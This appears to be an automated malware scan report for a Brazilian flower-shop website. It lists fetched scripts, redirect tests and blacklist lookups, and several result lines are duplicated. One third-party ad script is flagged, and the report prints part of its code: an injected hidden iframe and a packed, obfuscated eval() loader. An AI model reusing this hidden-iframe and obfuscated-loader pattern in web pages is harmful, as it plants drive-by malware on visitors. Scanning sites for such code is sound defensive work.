Scanned pages/files
Request | Server response | Status |
http://www.buquedeflores.net.br/ | 200 OK Content-Length: 80199 Content-Type: text/html | clean |
http://code.jquery.com/jquery-latest.js | 200 OK Content-Length: 282766 Content-Type: application/x-javascript | clean |
http://ads.egrana.com.br/anuncio/popup/7382 | 200 OK Content-Length: 6553 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe style="display:none" src="http://ads.egrana.com.br/stats/pop/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe>');eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+' Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 20008 Content-Type: text/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://www.google.com/cse/t13n?form=cse-search-box&t13n_langs=en | 200 OK Content-Length: 2217 Content-Type: text/javascript | clean |
http://www.google.com.br/coop/cse/brand?form=cse-search-box&lang=pt | 200 OK Content-Length: 2518 Content-Type: text/javascript | clean |
http://www.buquedeflores.net.br//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 69894 Content-Type: text/html | clean |
http://static.boo-box.com/javascripts/embed.js | 200 OK Content-Length: 23239 Content-Type: application/x-javascript | clean |
http://www.anunciad.com.br/table_ad.jsp?partner=6035 | 200 OK Content-Length: 2419 Content-Type: text/html | clean |
http://www.anunciad.com.br/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://carnage.spider.ad?id=7806/ | 200 OK Content-Length: 13 Content-Type: application/json | clean |
https://www.blogger.com/static/v1/widgets/3512243057-widgets.js | 200 OK Content-Length: 90257 Content-Type: text/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12790 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: buquedeflores.net.br
Result:
GET / HTTP/1.1
Host: buquedeflores.net.br
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: buquedeflores.net.br
Referer: http://www.google.com/search?q=buquedeflores.net.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: buquedeflores.net.br
Referer: http://www.google.com/search?q=buquedeflores.net.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=buquedeflores.net.br
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://buquedeflores.net.br/
Result: buquedeflores.net.br is not infected or malware details are not published yet.
Result: buquedeflores.net.br is not infected or malware details are not published yet.